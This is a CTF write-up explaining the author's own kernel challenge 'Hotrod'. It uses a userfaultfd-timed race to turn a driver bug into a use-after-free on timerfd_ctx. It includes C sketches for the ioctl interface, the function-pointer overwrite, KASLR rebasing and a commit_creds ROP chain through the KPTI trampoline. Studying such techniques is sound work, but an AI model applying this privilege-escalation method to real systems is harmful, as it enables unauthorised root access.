Recently, I made some pwn challenges for my teammate Chirality, who helped organize CUCTF 2020: Dr. Xorisaurus (glibc 2.32 heap) and Hotrod (kernel heap and race). I thought it would be nice to share my writeups for each. You should also check out Chirality's kernel heap challenge for CUCTF, called BYOD.
Before I start, I would like to acknowledge and give appropriate credit to the authors of all the resources linked throughout this article, which I studied to make both this challenge and my exploit possible.
If you have done plenty of glibc heap exploitation before, there is one important idea you should note about kernel heap exploitation. Rather than relying completely on kernel heap feng shui (even though the allocators are much simpler in kernel), it's oftentimes better to utilize certain structures with function pointers for leaks and RIP control. The basis of this challenge is to use a race condition to create a UAF scenario, from which you can hijack timerfd_ctx structures to take control of RIP.
Opening this challenge up, it looks like a standard kernel pwn setup. A file system, a bzImage, and a qemu launch script are given. The following two commands will be very handy for manipulating the file system for debugging/analysis purposes:
The qemu launch script is the following:
This tells us that SMEP, KPTI, and KASLR are enabled, but there is no SMAP (which simplifies this a lot).
We can also use extract-vmlinux to extract the kernel from its compressed image. Based on the startup script (and the name of the challenge), the driver itself is hotrod.ko. Now, let's do a quick analysis of the driver.
Like many other standard CTF kernel challenges, a miscdevice is created during initialization and a mutex is also initialized. The device has a file_operations struct in which only the unlocked_ioctl field is populated. Looking through hotrod_ioctl, one can also infer that there is a global struct, located at 0x7e0 relative to the module base, that stores both the size as an unsigned long and a pointer to an allocated chunk. The handler implements add, show, delete, and edit operations, each of which can only be used once (and you only get one hotrod in total). Allocation occurs when the ioctl command is 0xBAADC0DE.
It checks whether you have already attempted an allocation and whether the hotrod has already been populated. If not, it will allocate a chunk for the hotrod and set its size to the argument passed in (the size must fall within the 0xd0 to 0xe0 range). There doesn't seem to be a bug here. Delete occurs when the ioctl command is 0xC001C0DE.
Again, proper checks are in place, and the hotrod is zeroed out. This feature can also only be used once. Viewing occurs with ioctl command 0x1337C0DE.
Again, it seems quite safe. However, since kmalloc() doesn't zero out memory, we can use this for a leak after we allocate and free certain kernel structures. Lastly, edit occurs with ioctl command 0xDEADC0DE.
Again, it seems pretty safe. As with the viewing function, the argument is interpreted as a pointer to a hotrod struct. The sizes for editing (as well as for viewing earlier on) are both checked, so there is no going out of bounds and no overflow. In edit's case, if the size check passes, it will proceed to copy the user's data to the kernel hotrod's car.
Overall, this module looks quite safe. Where exactly could the bug be? Well, in this ioctl handler, the mutex is never actually used, which opens the handler up to race conditions.
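To make the interface described above concrete, here is a minimal userspace sketch of the four commands. The command values come from the analysis; the struct name, field names, field order, wrapper names, and the inclusive size bounds are all my assumptions for illustration, not something recovered from the driver.

```c
#include <stddef.h>
#include <sys/ioctl.h>

/* Command values as described in the analysis of hotrod_ioctl. */
#define HOTROD_ALLOC  0xBAADC0DEUL
#define HOTROD_DELETE 0xC001C0DEUL
#define HOTROD_SHOW   0x1337C0DEUL
#define HOTROD_EDIT   0xDEADC0DEUL

/* ASSUMPTION: user-side request mirroring the kernel's size + pointer pair.
 * The names and the field order are hypothetical. */
struct hotrod_req {
    unsigned long size;
    char *car;
};

/* ASSUMPTION: both bounds are treated as inclusive here. */
int hotrod_size_ok(unsigned long size)
{
    return size >= 0xd0 && size <= 0xe0;
}

/* Alloc takes the size directly as the ioctl argument. */
int hotrod_alloc(int fd, unsigned long size)
{
    if (!hotrod_size_ok(size))
        return -1;
    return ioctl(fd, HOTROD_ALLOC, size);
}

int hotrod_delete(int fd)
{
    return ioctl(fd, HOTROD_DELETE, 0UL);
}

/* Show and edit take a pointer to a user hotrod struct. */
int hotrod_show(int fd, struct hotrod_req *req)
{
    return ioctl(fd, HOTROD_SHOW, req);
}

int hotrod_edit(int fd, struct hotrod_req *req)
{
    return ioctl(fd, HOTROD_EDIT, req);
}
```

Checking the size in userspace first just avoids burning the single allocation attempt on a request the driver would reject.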
Due to the size checks and the restriction that each feature can only be used once, a good race strategy is to launch edit in one thread and, in another thread, quickly free the chunk and allocate another kernel structure, timed so that edit's second copy_from_user() runs after the chunk has been freed but with the stale pointer to the chunk already passed to the function. A great way to race reliably is with the userfaultfd syscall. With userfaultfd, we can set up a page fault handler over a certain page we mmap in userspace. Even when the page fault is triggered by the kernel accessing that page, our handler will run; from there, we can hang the kernel thread, run the code meant for the race, and then unblock it with a UFFDIO_COPY ioctl where uffdio_copy.mode is not set. This is actually an extremely common technique for racing reliably in the kernel, with several articles and CTF challenges including this concept (such as the famous Balsn CTF KrazyNote challenge):
There does seem to be a recent hardening against this method of attack, as mentioned here, but it is not enabled by default for compatibility reasons.
From our exploit's perspective, we can have one thread call edit and have it copy over a user hotrod struct whose data, or "car," pointer points to a page for which we have set up a userfaultfd handler. Then, during edit's second copy_from_user(), the kernel will page fault when it attempts to copy from our pointer, and our handler will take over; from there, we can free the hotrod and allocate other kernel structures over the same region. We can then unblock the thread by copying over the data we want placed there. Personally, I kept all the original data with the copy (to avoid corrupting the kernel structure) except for one of the function pointers, which I changed to a stack pivot. After the unblock, the code resumes and everything goes back to "normal," until the overwritten function pointer is triggered.
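The "keep everything except one function pointer" step can be sketched as a small helper that prepares the page handed to UFFDIO_COPY. This is only an illustration: the helper name is hypothetical, and the 0x28 offset for the hrtimer callback inside timerfd_ctx is an assumption that should be verified against the target kernel's struct layout.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* ASSUMPTION: offset of the hrtimer callback pointer within timerfd_ctx.
 * Check this against the target kernel before relying on it. */
#define TMR_FUNCTION_OFFSET 0x28

/* Copy the previously leaked object contents into the page that will be fed
 * to the blocked copy_from_user(), then overwrite a single function pointer
 * with the stack pivot gadget. Returns 0 on success, -1 on bad bounds. */
int build_edit_payload(uint8_t *page, size_t page_len,
                       const uint8_t *original, size_t obj_size,
                       size_t fn_off, uint64_t pivot_gadget)
{
    if (obj_size > page_len || fn_off + sizeof(pivot_gadget) > obj_size)
        return -1;
    memcpy(page, original, obj_size);                     /* preserve struct */
    memcpy(page + fn_off, &pivot_gadget, sizeof(pivot_gadget)); /* hijack */
    return 0;
}
```

Preserving the rest of the object matters because the kernel keeps using the structure (for example, its timer queue linkage) until the callback fires.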
Due to our structure size, many of the common structures can't be used. However, timerfd_ctx can be quite a useful struct; we can allocate it with a timerfd_create() with the CLOCK_REALTIME option (other options will also work) and a timerfd_settime() call. Using this structure, we can both get a leak and control RIP via the location that stores the function pointer to timerfd_tmrproc(). The function pointer executes after a certain time period, which you can control in the itimerspec struct. This structure has been documented before in ptr-yudai's article about useful kernel structures, this paper about exploitable structures, and GNote from TokyoWesterns 2019. Note that for me, any subsequent sleep calls with the corrupted structure would fail, so I hung the thread with a getchar() to wait for the function pointer to trigger.
To grab a leak, I had to spray these structs in the same kmalloc slabs. Then, I freed the last sprayed chunk and immediately made hotrod allocate its data there so that we could grab the leak reliably. With the KASLR leak, we can rebase the entire kernel relative to the startup_64 symbol in kallsyms and then use the aforementioned race to change the function pointer to a stack pivot gadget; we can pivot to a userspace stack as there is no SMAP. Note that you need to specify a valid range for ropper/ROPGadget to search for gadgets; otherwise, it'll find gadgets that aren't in executable sections of the kernel. Take a look at the example below:
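The rebasing arithmetic and the gadget range check are simple enough to sketch as pure helpers. The function names are hypothetical, and every offset and address passed in is something you would read out of your own kallsyms dump and gadget search; none are values from this challenge.

```c
#include <stdint.h>

/* Given a leaked pointer to a known symbol (for example timerfd_tmrproc) and
 * that symbol's offset from startup_64, recover the randomized kernel base. */
uint64_t kernel_base_from_leak(uint64_t leaked_ptr, uint64_t symbol_offset)
{
    return leaked_ptr - symbol_offset;
}

/* Turn an offset from startup_64 into a runtime address. */
uint64_t rebase(uint64_t kernel_base, uint64_t offset)
{
    return kernel_base + offset;
}

/* Reject gadget offsets that fall outside the executable text range
 * [text_start, text_end), since gadget finders may report byte sequences
 * that live in non-executable sections. */
int gadget_in_text(uint64_t gadget_off, uint64_t text_start, uint64_t text_end)
{
    return gadget_off >= text_start && gadget_off < text_end;
}
```

For instance, with an illustrative leak of 0xffffffff9a2c1230 and a symbol offset of 0x2c1230, kernel_base_from_leak() yields 0xffffffff9a000000, and every other symbol or gadget is then base plus its offset.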
Since both KPTI and SMEP are enabled, the traditional SMEP bypass of changing the CR4 register won't work; KPTI fully isolates user page tables from kernel page tables by managing the two sets via bit 12 of the CR3 register (the userspace portion of the kernel page tables is set to NX, and the only additional information given to the userspace page tables is what is necessary to enter and exit the kernel). Instead, it is better to rely on a KPTI trampoline (swapgs_restore_regs_and_return_to_usermode) and have it fix CR3 for us so we can return to userspace; this functionality exists in the kernel because it needs to handle the transition for routines like syscalls. I usually add +0x16 to where this is located, just so I can skip all the initial pops and start right at movq %rsp, %rdi. Using this trampoline, combined with a commit_creds(init_cred) beforehand to change my uid to 0, I can then choose whichever function in my userspace code to return to with root privileges. Of course, I needed to specify the cs, ss, rflags, and stack for the trampoline to return to as well (specifically, at that location, it expects RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS); I just used the values I saved beforehand in the userspace process.
In my case, I was not able to execve or perform many other functions without causing a kernel panic, so I ended up doing an open/read/write sequence in my function. I also had to just halt the OS; otherwise, the kernel panics on the return, hangs, and then somehow spikes my CPU usage to 100%. I'm not too sure why that happened, so if you know why, please let me know.
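Laid out as data, the chain described above might look like the sketch below. The struct and function names are hypothetical, the use of a pop rdi; ret gadget to load init_cred is my assumption about how the argument gets set, and all addresses are expected to be already rebased for the running kernel.

```c
#include <stddef.h>
#include <stdint.h>

/* Userspace register state saved before triggering the exploit. */
struct user_state {
    uint64_t rip, cs, rflags, rsp, ss;
};

/* Rebased kernel addresses. ASSUMPTION: a "pop rdi; ret" gadget is used to
 * place init_cred in RDI before calling commit_creds. */
struct kaddrs {
    uint64_t pop_rdi_ret;
    uint64_t init_cred;
    uint64_t commit_creds;
    uint64_t kpti_trampoline; /* swapgs_restore_regs_and_return_to_usermode */
};

/* Skip the initial pops and land on the mov that copies RSP into RDI. */
#define TRAMPOLINE_SKIP 0x16

/* Write the chain into chain[0..cap) and return the number of entries used,
 * or 0 if the buffer is too small. */
size_t build_rop_chain(uint64_t *chain, size_t cap,
                       const struct kaddrs *k, const struct user_state *u)
{
    const uint64_t entries[] = {
        k->pop_rdi_ret,
        k->init_cred,
        k->commit_creds,                       /* commit_creds(init_cred) */
        k->kpti_trampoline + TRAMPOLINE_SKIP,
        0,                                     /* RDI slot (dummy) */
        0,                                     /* orig_ax slot (dummy) */
        u->rip,                                /* userspace return target */
        u->cs,
        u->rflags,
        u->rsp,
        u->ss,
    };
    size_t n = sizeof(entries) / sizeof(entries[0]);
    if (cap < n)
        return 0;
    for (size_t i = 0; i < n; i++)
        chain[i] = entries[i];
    return n;
}
```

The chain would be written at the userspace address the stack pivot gadget moves RSP to, which is only possible here because SMAP is disabled.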
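The open/read/write fallback can be as small as the helper below, which is a sketch rather than the function from my exploit. The function name is hypothetical, and the path you pass (for example a flag file readable only by root) depends on the challenge setup.

```c
#include <fcntl.h>
#include <unistd.h>

/* Copy the contents of path to out_fd using only open/read/write.
 * Returns the number of bytes copied, or -1 on error. */
long dump_file(const char *path, int out_fd)
{
    char buf[256];
    long total = 0;
    ssize_t n;

    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    while ((n = read(fd, buf, sizeof(buf))) > 0) {
        if (write(out_fd, buf, (size_t)n) != n) {
            close(fd);
            return -1;
        }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}
```

Called as dump_file(path, STDOUT_FILENO) from the function the trampoline returns to, this prints the file without needing execve.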
Below is my exploit with comments and linked resources:
To transfer the exploit to the remote instance, I just compiled it statically with gcc, gzip'd it, and then transferred it with base64 encoding and cat > exploit << EOF. It was still relatively large and took about 7 minutes to transfer, but if one were really working under time constraints, compiling against a more minimalistic library like musl or uclibc could help. Here's the final result: